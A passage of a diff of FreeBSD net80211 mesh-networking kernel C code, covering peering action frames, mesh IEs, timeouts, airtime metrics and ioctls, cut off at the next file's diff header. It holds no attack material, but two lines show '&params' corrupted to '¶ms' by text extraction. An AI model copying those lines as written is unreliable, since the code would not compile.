IEEE80211_NOTE_MAC(vap, IEEE80211_MSG_MESH, ie.gann_addr, "%s", "propagate GANN"); ieee80211_send_action(vap->iv_bss, IEEE80211_ACTION_CAT_MESH, IEEE80211_ACTION_MESH_GANN, &pgann); return 0; } static int mesh_send_action(struct ieee80211_node *ni, const uint8_t sa[IEEE80211_ADDR_LEN], const uint8_t da[IEEE80211_ADDR_LEN], struct mbuf *m) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_bpf_params params; struct ieee80211_frame *wh; int ret; KASSERT(ni != NULL, ("null node")); if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT, ni, "block %s frame in CAC state", "Mesh action"); vap->iv_stats.is_tx_badstate++; ieee80211_free_node(ni); m_freem(m); return EIO; /* XXX */ } M_PREPEND(m, sizeof(struct ieee80211_frame), M_DONTWAIT); if (m == NULL) { ieee80211_free_node(ni); return ENOMEM; } IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_ACTION, IEEE80211_NONQOS_TID, sa, da, sa); m->m_flags |= M_ENCAP; /* mark encapsulated */ memset(¶ms, 0, sizeof(params)); params.ibp_pri = WME_AC_VO; params.ibp_rate0 = ni->ni_txparms->mgmtrate; if (IEEE80211_IS_MULTICAST(da)) params.ibp_try0 = 1; else params.ibp_try0 = ni->ni_txparms->maxretry; params.ibp_power = ni->ni_txpower; IEEE80211_NODE_STAT(ni, tx_mgmt); ret = ieee80211_raw_output(vap, ni, m, ¶ms); IEEE80211_TX_UNLOCK(ic); return (ret); } #define ADDSHORT(frm, v) do { \ frm[0] = (v) & 0xff; \ frm[1] = (v) >> 8; \ frm += 2; \ } while (0) #define ADDWORD(frm, v) do { \ frm[0] = (v) & 0xff; \ frm[1] = ((v) >> 8) & 0xff; \ frm[2] = ((v) >> 16) & 0xff; \ frm[3] = ((v) >> 24) & 0xff; \ frm += 4; \ } while (0) static int mesh_send_action_meshpeering_open(struct ieee80211_node *ni, int category, int action, void *args0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; uint16_t *args = args0; const struct ieee80211_rateset *rs; struct mbuf *m; uint8_t *frm; IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "send PEER OPEN action: localid 0x%x", args[0]); IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) /* action+category */ + sizeof(uint16_t) /* capabilites */ + 2 + IEEE80211_RATE_SIZE + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + 2 + IEEE80211_MESHID_LEN + sizeof(struct ieee80211_meshconf_ie) + sizeof(struct ieee80211_meshpeer_ie) ); if (m != NULL) { /* * mesh peer open action frame format: * [1] category * [1] action * [2] capabilities * [tlv] rates * [tlv] xrates * [tlv] mesh id * [tlv] mesh conf * [tlv] mesh peer link mgmt */ *frm++ = category; *frm++ = action; ADDSHORT(frm, ieee80211_getcapinfo(vap, ni->ni_chan)); rs = ieee80211_get_suprates(ic, ic->ic_curchan); frm = ieee80211_add_rates(frm, rs); frm = ieee80211_add_xrates(frm, rs); frm = ieee80211_add_meshid(frm, vap); frm = ieee80211_add_meshconf(frm, vap); frm = ieee80211_add_meshpeer(frm, IEEE80211_ACTION_MESHPEERING_OPEN, args[0], 0, 0); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, ni->ni_macaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static int mesh_send_action_meshpeering_confirm(struct ieee80211_node *ni, int category, int action, void *args0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; uint16_t *args = args0; const struct ieee80211_rateset *rs; struct mbuf *m; uint8_t *frm; IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "send PEER CONFIRM action: localid 0x%x, peerid 0x%x", args[0], args[1]); IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) /* action+category */ + sizeof(uint16_t) /* capabilites */ + sizeof(uint16_t) /* status code */ + sizeof(uint16_t) /* AID */ + 2 + IEEE80211_RATE_SIZE + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + 2 + IEEE80211_MESHID_LEN + sizeof(struct ieee80211_meshconf_ie) + sizeof(struct ieee80211_meshpeer_ie) ); if (m != NULL) { /* * mesh peer confirm action frame format: * [1] category * [1] action * [2] capabilities * [2] status code * [2] association id (peer ID) * [tlv] rates * [tlv] xrates * [tlv] mesh id * [tlv] mesh conf * [tlv] mesh peer link mgmt */ *frm++ = category; *frm++ = action; ADDSHORT(frm, ieee80211_getcapinfo(vap, ni->ni_chan)); ADDSHORT(frm, 0); /* status code */ ADDSHORT(frm, args[1]); /* AID */ rs = ieee80211_get_suprates(ic, ic->ic_curchan); frm = ieee80211_add_rates(frm, rs); frm = ieee80211_add_xrates(frm, rs); frm = ieee80211_add_meshid(frm, vap); frm = ieee80211_add_meshconf(frm, vap); frm = ieee80211_add_meshpeer(frm, IEEE80211_ACTION_MESHPEERING_CONFIRM, args[0], args[1], 0); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, ni->ni_macaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static int mesh_send_action_meshpeering_close(struct ieee80211_node *ni, int category, int action, void *args0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; uint16_t *args = args0; struct mbuf *m; uint8_t *frm; IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "send PEER CLOSE action: localid 0x%x, peerid 0x%x reason %d", args[0], args[1], args[2]); IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) /* action+category */ + sizeof(uint16_t) /* reason code */ + 2 + IEEE80211_MESHID_LEN + sizeof(struct ieee80211_meshpeer_ie) ); if (m != NULL) { /* * mesh peer close action frame format: * [1] category * [1] action * [tlv] mesh id * [tlv] mesh peer link mgmt */ *frm++ = category; *frm++ = action; frm = ieee80211_add_meshid(frm, vap); frm = ieee80211_add_meshpeer(frm, IEEE80211_ACTION_MESHPEERING_CLOSE, args[0], args[1], args[2]); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, ni->ni_macaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static int mesh_send_action_meshlmetric(struct ieee80211_node *ni, int category, int action, void *arg0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_meshlmetric_ie *ie = arg0; struct mbuf *m; uint8_t *frm; if (ie->lm_flags & IEEE80211_MESH_LMETRIC_FLAGS_REQ) { IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "%s", "send LINK METRIC REQUEST action"); } else { IEEE80211_NOTE(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, ni, "send LINK METRIC REPLY action: metric 0x%x", ie->lm_metric); } IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) + /* action+category */ sizeof(struct ieee80211_meshlmetric_ie) ); if (m != NULL) { /* * mesh link metric * [1] category * [1] action * [tlv] mesh link metric */ *frm++ = category; *frm++ = action; frm = ieee80211_add_meshlmetric(frm, ie->lm_flags, ie->lm_metric); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, ni->ni_macaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static int mesh_send_action_meshgate(struct ieee80211_node *ni, int category, int action, void *arg0) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_meshgann_ie *ie = arg0; struct mbuf *m; uint8_t *frm; IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) + /* action+category */ IEEE80211_MESHGANN_BASE_SZ ); if (m != NULL) { /* * mesh link metric * [1] category * [1] action * [tlv] mesh gate annoucement */ *frm++ = category; *frm++ = action; frm = ieee80211_add_meshgate(frm, ie); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); return mesh_send_action(ni, vap->iv_myaddr, broadcastaddr, m); } else { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } } static void mesh_peer_timeout_setup(struct ieee80211_node *ni) { switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_HOLDING: ni->ni_mltval = ieee80211_mesh_holdingtimeout; break; case IEEE80211_NODE_MESH_CONFIRMRCV: ni->ni_mltval = ieee80211_mesh_confirmtimeout; break; case IEEE80211_NODE_MESH_IDLE: ni->ni_mltval = 0; break; default: ni->ni_mltval = ieee80211_mesh_retrytimeout; break; } if (ni->ni_mltval) callout_reset(&ni->ni_mltimer, ni->ni_mltval, mesh_peer_timeout_cb, ni); } /* * Same as above but backoffs timer statisically 50%. */ static void mesh_peer_timeout_backoff(struct ieee80211_node *ni) { uint32_t r; r = arc4random(); ni->ni_mltval += r % ni->ni_mltval; callout_reset(&ni->ni_mltimer, ni->ni_mltval, mesh_peer_timeout_cb, ni); } static __inline void mesh_peer_timeout_stop(struct ieee80211_node *ni) { callout_drain(&ni->ni_mltimer); } static void mesh_peer_backoff_cb(void *arg) { struct ieee80211_node *ni = (struct ieee80211_node *)arg; /* After backoff timeout, try to peer automatically again. */ ni->ni_mlhcnt = 0; } /* * Mesh Peer Link Management FSM timeout handling. */ static void mesh_peer_timeout_cb(void *arg) { struct ieee80211_node *ni = (struct ieee80211_node *)arg; uint16_t args[3]; IEEE80211_NOTE(ni->ni_vap, IEEE80211_MSG_MESH, ni, "mesh link timeout, state %d, retry counter %d", ni->ni_mlstate, ni->ni_mlrcnt); switch (ni->ni_mlstate) { case IEEE80211_NODE_MESH_IDLE: case IEEE80211_NODE_MESH_ESTABLISHED: break; case IEEE80211_NODE_MESH_OPENSNT: case IEEE80211_NODE_MESH_OPENRCV: if (ni->ni_mlrcnt == ieee80211_mesh_maxretries) { args[0] = ni->ni_mlpid; args[2] = IEEE80211_REASON_MESH_MAX_RETRIES; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); ni->ni_mlrcnt = 0; mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); } else { args[0] = ni->ni_mlpid; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_OPEN, args); ni->ni_mlrcnt++; mesh_peer_timeout_backoff(ni); } break; case IEEE80211_NODE_MESH_CONFIRMRCV: args[0] = ni->ni_mlpid; args[2] = IEEE80211_REASON_MESH_CONFIRM_TIMEOUT; ieee80211_send_action(ni, IEEE80211_ACTION_CAT_SELF_PROT, IEEE80211_ACTION_MESHPEERING_CLOSE, args); mesh_linkchange(ni, IEEE80211_NODE_MESH_HOLDING); mesh_peer_timeout_setup(ni); break; case IEEE80211_NODE_MESH_HOLDING: ni->ni_mlhcnt++; if (ni->ni_mlhcnt >= ieee80211_mesh_maxholding) callout_reset(&ni->ni_mlhtimer, ieee80211_mesh_backofftimeout, mesh_peer_backoff_cb, ni); mesh_linkchange(ni, IEEE80211_NODE_MESH_IDLE); break; } } static int mesh_verify_meshid(struct ieee80211vap *vap, const uint8_t *ie) { struct ieee80211_mesh_state *ms = vap->iv_mesh; if (ie == NULL || ie[1] != ms->ms_idlen) return 1; return memcmp(ms->ms_id, ie + 2, ms->ms_idlen); } /* * Check if we are using the same algorithms for this mesh. */ static int mesh_verify_meshconf(struct ieee80211vap *vap, const uint8_t *ie) { const struct ieee80211_meshconf_ie *meshconf = (const struct ieee80211_meshconf_ie *) ie; const struct ieee80211_mesh_state *ms = vap->iv_mesh; if (meshconf == NULL) return 1; if (meshconf->conf_pselid != ms->ms_ppath->mpp_ie) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown path selection algorithm: 0x%x\n", meshconf->conf_pselid); return 1; } if (meshconf->conf_pmetid != ms->ms_pmetric->mpm_ie) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown path metric algorithm: 0x%x\n", meshconf->conf_pmetid); return 1; } if (meshconf->conf_ccid != 0) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown congestion control algorithm: 0x%x\n", meshconf->conf_ccid); return 1; } if (meshconf->conf_syncid != IEEE80211_MESHCONF_SYNC_NEIGHOFF) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown sync algorithm: 0x%x\n", meshconf->conf_syncid); return 1; } if (meshconf->conf_authid != 0) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "unknown auth auth algorithm: 0x%x\n", meshconf->conf_pselid); return 1; } /* Not accepting peers */ if (!(meshconf->conf_cap & IEEE80211_MESHCONF_CAP_AP)) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_MESH, "not accepting peers: 0x%x\n", meshconf->conf_cap); return 1; } return 0; } static int mesh_verify_meshpeer(struct ieee80211vap *vap, uint8_t subtype, const uint8_t *ie) { const struct ieee80211_meshpeer_ie *meshpeer = (const struct ieee80211_meshpeer_ie *) ie; if (meshpeer == NULL || meshpeer->peer_len < IEEE80211_MPM_BASE_SZ || meshpeer->peer_len > IEEE80211_MPM_MAX_SZ) return 1; if (meshpeer->peer_proto != IEEE80211_MPPID_MPM) { IEEE80211_DPRINTF(vap, IEEE80211_MSG_ACTION | IEEE80211_MSG_MESH, "Only MPM protocol is supported (proto: 0x%02X)", meshpeer->peer_proto); return 1; } switch (subtype) { case IEEE80211_ACTION_MESHPEERING_OPEN: if (meshpeer->peer_len != IEEE80211_MPM_BASE_SZ) return 1; break; case IEEE80211_ACTION_MESHPEERING_CONFIRM: if (meshpeer->peer_len != IEEE80211_MPM_BASE_SZ + 2) return 1; break; case IEEE80211_ACTION_MESHPEERING_CLOSE: if (meshpeer->peer_len < IEEE80211_MPM_BASE_SZ + 2) return 1; if (meshpeer->peer_len == (IEEE80211_MPM_BASE_SZ + 2) && meshpeer->peer_linkid != 0) return 1; if (meshpeer->peer_rcode == 0) return 1; break; } return 0; } /* * Add a Mesh ID IE to a frame. */ uint8_t * ieee80211_add_meshid(uint8_t *frm, struct ieee80211vap *vap) { struct ieee80211_mesh_state *ms = vap->iv_mesh; KASSERT(vap->iv_opmode == IEEE80211_M_MBSS, ("not a mbss vap")); *frm++ = IEEE80211_ELEMID_MESHID; *frm++ = ms->ms_idlen; memcpy(frm, ms->ms_id, ms->ms_idlen); return frm + ms->ms_idlen; } /* * Add a Mesh Configuration IE to a frame. * For now just use HWMP routing, Airtime link metric, Null Congestion * Signaling, Null Sync Protocol and Null Authentication. */ uint8_t * ieee80211_add_meshconf(uint8_t *frm, struct ieee80211vap *vap) { const struct ieee80211_mesh_state *ms = vap->iv_mesh; uint16_t caps; KASSERT(vap->iv_opmode == IEEE80211_M_MBSS, ("not a MBSS vap")); *frm++ = IEEE80211_ELEMID_MESHCONF; *frm++ = IEEE80211_MESH_CONF_SZ; *frm++ = ms->ms_ppath->mpp_ie; /* path selection */ *frm++ = ms->ms_pmetric->mpm_ie; /* link metric */ *frm++ = IEEE80211_MESHCONF_CC_DISABLED; *frm++ = IEEE80211_MESHCONF_SYNC_NEIGHOFF; *frm++ = IEEE80211_MESHCONF_AUTH_DISABLED; /* NB: set the number of neighbors before the rest */ *frm = (ms->ms_neighbors > IEEE80211_MESH_MAX_NEIGHBORS ? IEEE80211_MESH_MAX_NEIGHBORS : ms->ms_neighbors) << 1; if (ms->ms_flags & IEEE80211_MESHFLAGS_GATE) *frm |= IEEE80211_MESHCONF_FORM_GATE; frm += 1; caps = 0; if (ms->ms_flags & IEEE80211_MESHFLAGS_AP) caps |= IEEE80211_MESHCONF_CAP_AP; if (ms->ms_flags & IEEE80211_MESHFLAGS_FWD) caps |= IEEE80211_MESHCONF_CAP_FWRD; *frm++ = caps; return frm; } /* * Add a Mesh Peer Management IE to a frame. */ uint8_t * ieee80211_add_meshpeer(uint8_t *frm, uint8_t subtype, uint16_t localid, uint16_t peerid, uint16_t reason) { KASSERT(localid != 0, ("localid == 0")); *frm++ = IEEE80211_ELEMID_MESHPEER; switch (subtype) { case IEEE80211_ACTION_MESHPEERING_OPEN: *frm++ = IEEE80211_MPM_BASE_SZ; /* length */ ADDSHORT(frm, IEEE80211_MPPID_MPM); /* proto */ ADDSHORT(frm, localid); /* local ID */ break; case IEEE80211_ACTION_MESHPEERING_CONFIRM: KASSERT(peerid != 0, ("sending peer confirm without peer id")); *frm++ = IEEE80211_MPM_BASE_SZ + 2; /* length */ ADDSHORT(frm, IEEE80211_MPPID_MPM); /* proto */ ADDSHORT(frm, localid); /* local ID */ ADDSHORT(frm, peerid); /* peer ID */ break; case IEEE80211_ACTION_MESHPEERING_CLOSE: if (peerid) *frm++ = IEEE80211_MPM_MAX_SZ; /* length */ else *frm++ = IEEE80211_MPM_BASE_SZ + 2; /* length */ ADDSHORT(frm, IEEE80211_MPPID_MPM); /* proto */ ADDSHORT(frm, localid); /* local ID */ if (peerid) ADDSHORT(frm, peerid); /* peer ID */ ADDSHORT(frm, reason); break; } return frm; } /* * Compute an Airtime Link Metric for the link with this node. * * Based on Draft 3.0 spec (11B.10, p.149). */ /* * Max 802.11s overhead. */ #define IEEE80211_MESH_MAXOVERHEAD \ (sizeof(struct ieee80211_qosframe_addr4) \ + sizeof(struct ieee80211_meshcntl_ae10) \ + sizeof(struct llc) \ + IEEE80211_ADDR_LEN \ + IEEE80211_WEP_IVLEN \ + IEEE80211_WEP_KIDLEN \ + IEEE80211_WEP_CRCLEN \ + IEEE80211_WEP_MICLEN \ + IEEE80211_CRC_LEN) uint32_t mesh_airtime_calc(struct ieee80211_node *ni) { #define M_BITS 8 #define S_FACTOR (2 * M_BITS) struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ni->ni_vap->iv_ifp; const static int nbits = 8192 << M_BITS; uint32_t overhead, rate, errrate; uint64_t res; /* Time to transmit a frame */ rate = ni->ni_txrate; overhead = ieee80211_compute_duration(ic->ic_rt, ifp->if_mtu + IEEE80211_MESH_MAXOVERHEAD, rate, 0) << M_BITS; /* Error rate in percentage */ /* XXX assuming small failures are ok */ errrate = (((ifp->if_oerrors + ifp->if_ierrors) / 100) << M_BITS) / 100; res = (overhead + (nbits / rate)) * ((1 << S_FACTOR) / ((1 << M_BITS) - errrate)); return (uint32_t)(res >> S_FACTOR); #undef M_BITS #undef S_FACTOR } /* * Add a Mesh Link Metric report IE to a frame. */ uint8_t * ieee80211_add_meshlmetric(uint8_t *frm, uint8_t flags, uint32_t metric) { *frm++ = IEEE80211_ELEMID_MESHLINK; *frm++ = 5; *frm++ = flags; ADDWORD(frm, metric); return frm; } /* * Add a Mesh Gate Announcement IE to a frame. */ uint8_t * ieee80211_add_meshgate(uint8_t *frm, struct ieee80211_meshgann_ie *ie) { *frm++ = IEEE80211_ELEMID_MESHGANN; /* ie */ *frm++ = IEEE80211_MESHGANN_BASE_SZ; /* len */ *frm++ = ie->gann_flags; *frm++ = ie->gann_hopcount; *frm++ = ie->gann_ttl; IEEE80211_ADDR_COPY(frm, ie->gann_addr); frm += 6; ADDWORD(frm, ie->gann_seq); ADDSHORT(frm, ie->gann_interval); return frm; } #undef ADDSHORT #undef ADDWORD /* * Initialize any mesh-specific node state. */ void ieee80211_mesh_node_init(struct ieee80211vap *vap, struct ieee80211_node *ni) { ni->ni_flags |= IEEE80211_NODE_QOS; callout_init(&ni->ni_mltimer, CALLOUT_MPSAFE); callout_init(&ni->ni_mlhtimer, CALLOUT_MPSAFE); } /* * Cleanup any mesh-specific node state. */ void ieee80211_mesh_node_cleanup(struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211_mesh_state *ms = vap->iv_mesh; callout_drain(&ni->ni_mltimer); callout_drain(&ni->ni_mlhtimer); /* NB: short-circuit callbacks after mesh_vdetach */ if (vap->iv_mesh != NULL) ms->ms_ppath->mpp_peerdown(ni); } void ieee80211_parse_meshid(struct ieee80211_node *ni, const uint8_t *ie) { ni->ni_meshidlen = ie[1]; memcpy(ni->ni_meshid, ie + 2, ie[1]); } /* * Setup mesh-specific node state on neighbor discovery. */ void ieee80211_mesh_init_neighbor(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const struct ieee80211_scanparams *sp) { ieee80211_parse_meshid(ni, sp->meshid); } void ieee80211_mesh_update_beacon(struct ieee80211vap *vap, struct ieee80211_beacon_offsets *bo) { KASSERT(vap->iv_opmode == IEEE80211_M_MBSS, ("not a MBSS vap")); if (isset(bo->bo_flags, IEEE80211_BEACON_MESHCONF)) { (void)ieee80211_add_meshconf(bo->bo_meshconf, vap); clrbit(bo->bo_flags, IEEE80211_BEACON_MESHCONF); } } static int mesh_ioctl_get80211(struct ieee80211vap *vap, struct ieee80211req *ireq) { struct ieee80211_mesh_state *ms = vap->iv_mesh; uint8_t tmpmeshid[IEEE80211_NWID_LEN]; struct ieee80211_mesh_route *rt; struct ieee80211req_mesh_route *imr; size_t len, off; uint8_t *p; int error; if (vap->iv_opmode != IEEE80211_M_MBSS) return ENOSYS; error = 0; switch (ireq->i_type) { case IEEE80211_IOC_MESH_ID: ireq->i_len = ms->ms_idlen; memcpy(tmpmeshid, ms->ms_id, ireq->i_len); error = copyout(tmpmeshid, ireq->i_data, ireq->i_len); break; case IEEE80211_IOC_MESH_AP: ireq->i_val = (ms->ms_flags & IEEE80211_MESHFLAGS_AP) != 0; break; case IEEE80211_IOC_MESH_FWRD: ireq->i_val = (ms->ms_flags & IEEE80211_MESHFLAGS_FWD) != 0; break; case IEEE80211_IOC_MESH_GATE: ireq->i_val = (ms->ms_flags & IEEE80211_MESHFLAGS_GATE) != 0; break; case IEEE80211_IOC_MESH_TTL: ireq->i_val = ms->ms_ttl; break; case IEEE80211_IOC_MESH_RTCMD: switch (ireq->i_val) { case IEEE80211_MESH_RTCMD_LIST: len = 0; MESH_RT_LOCK(ms); TAILQ_FOREACH(rt, &ms->ms_routes, rt_next) { len += sizeof(*imr); } MESH_RT_UNLOCK(ms); if (len > ireq->i_len || ireq->i_len < sizeof(*imr)) { ireq->i_len = len; return ENOMEM; } ireq->i_len = len; /* XXX M_WAIT? */ p = malloc(len, M_TEMP, M_NOWAIT | M_ZERO); if (p == NULL) return ENOMEM; off = 0; MESH_RT_LOCK(ms); TAILQ_FOREACH(rt, &ms->ms_routes, rt_next) { if (off >= len) break; imr = (struct ieee80211req_mesh_route *) (p + off); IEEE80211_ADDR_COPY(imr->imr_dest, rt->rt_dest); IEEE80211_ADDR_COPY(imr->imr_nexthop, rt->rt_nexthop); imr->imr_metric = rt->rt_metric; imr->imr_nhops = rt->rt_nhops; imr->imr_lifetime = ieee80211_mesh_rt_update(rt, 0); imr->imr_lastmseq = rt->rt_lastmseq; imr->imr_flags = rt->rt_flags; /* last */ off += sizeof(*imr); } MESH_RT_UNLOCK(ms); error = copyout(p, (uint8_t *)ireq->i_data, ireq->i_len); free(p, M_TEMP); break; case IEEE80211_MESH_RTCMD_FLUSH: case IEEE80211_MESH_RTCMD_ADD: case IEEE80211_MESH_RTCMD_DELETE: return EINVAL; default: return ENOSYS; } break; case IEEE80211_IOC_MESH_PR_METRIC: len = strlen(ms->ms_pmetric->mpm_descr); if (ireq->i_len < len) return EINVAL; ireq->i_len = len; error = copyout(ms->ms_pmetric->mpm_descr, (uint8_t *)ireq->i_data, len); break; case IEEE80211_IOC_MESH_PR_PATH: len = strlen(ms->ms_ppath->mpp_descr); if (ireq->i_len < len) return EINVAL; ireq->i_len = len; error = copyout(ms->ms_ppath->mpp_descr, (uint8_t *)ireq->i_data, len); break; default: return ENOSYS; } return error; } IEEE80211_IOCTL_GET(mesh, mesh_ioctl_get80211); static int mesh_ioctl_set80211(struct ieee80211vap *vap, struct ieee80211req *ireq) { struct ieee80211_mesh_state *ms = vap->iv_mesh; uint8_t tmpmeshid[IEEE80211_NWID_LEN]; uint8_t tmpaddr[IEEE80211_ADDR_LEN]; char tmpproto[IEEE80211_MESH_PROTO_DSZ]; int error; if (vap->iv_opmode != IEEE80211_M_MBSS) return ENOSYS; error = 0; switch (ireq->i_type) { case IEEE80211_IOC_MESH_ID: if (ireq->i_val != 0 || ireq->i_len > IEEE80211_MESHID_LEN) return EINVAL; error = copyin(ireq->i_data, tmpmeshid, ireq->i_len); if (error != 0) break; memset(ms->ms_id, 0, IEEE80211_NWID_LEN); ms->ms_idlen = ireq->i_len; memcpy(ms->ms_id, tmpmeshid, ireq->i_len); error = ENETRESET; break; case IEEE80211_IOC_MESH_AP: if (ireq->i_val) ms->ms_flags |= IEEE80211_MESHFLAGS_AP; else ms->ms_flags &= ~IEEE80211_MESHFLAGS_AP; error = ENETRESET; break; case IEEE80211_IOC_MESH_FWRD: if (ireq->i_val) ms->ms_flags |= IEEE80211_MESHFLAGS_FWD; else ms->ms_flags &= ~IEEE80211_MESHFLAGS_FWD; mesh_gatemode_setup(vap); break; case IEEE80211_IOC_MESH_GATE: if (ireq->i_val) ms->ms_flags |= IEEE80211_MESHFLAGS_GATE; else ms->ms_flags &= ~IEEE80211_MESHFLAGS_GATE; break; case IEEE80211_IOC_MESH_TTL: ms->ms_ttl = (uint8_t) ireq->i_val; break; case IEEE80211_IOC_MESH_RTCMD: switch (ireq->i_val) { case IEEE80211_MESH_RTCMD_LIST: return EINVAL; case IEEE80211_MESH_RTCMD_FLUSH: ieee80211_mesh_rt_flush(vap); break; case IEEE80211_MESH_RTCMD_ADD: if (IEEE80211_ADDR_EQ(vap->iv_myaddr, ireq->i_data) || IEEE80211_ADDR_EQ(broadcastaddr, ireq->i_data)) return EINVAL; error = copyin(ireq->i_data, &tmpaddr, IEEE80211_ADDR_LEN); if (error == 0) ieee80211_mesh_discover(vap, tmpaddr, NULL); break; case IEEE80211_MESH_RTCMD_DELETE: ieee80211_mesh_rt_del(vap, ireq->i_data); break; default: return ENOSYS; } break; case IEEE80211_IOC_MESH_PR_METRIC: error = copyin(ireq->i_data, tmpproto, sizeof(tmpproto)); if (error == 0) { error = mesh_select_proto_metric(vap, tmpproto); if (error == 0) error = ENETRESET; } break; case IEEE80211_IOC_MESH_PR_PATH: error = copyin(ireq->i_data, tmpproto, sizeof(tmpproto)); if (error == 0) { error = mesh_select_proto_path(vap, tmpproto); if (error == 0) error = ENETRESET; } break; default: return ENOSYS; } return error; } IEEE80211_IOCTL_SET(mesh, mesh_ioctl_set80211); diff --git a/sys/net80211/ieee80211_output.c b/sys/net80211/ieee80211_output.c index f75820340389..c6730cbc4af4 100644 --- a/sys/net80211/ieee80211_output.c +++ b/sys/net80211/ieee80211_output.c @@ -1,3407 +1,3407 @@ /*- * Copyright (c) 2001 Atsushi Onoe * Copyright (c) 2002-2009 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * 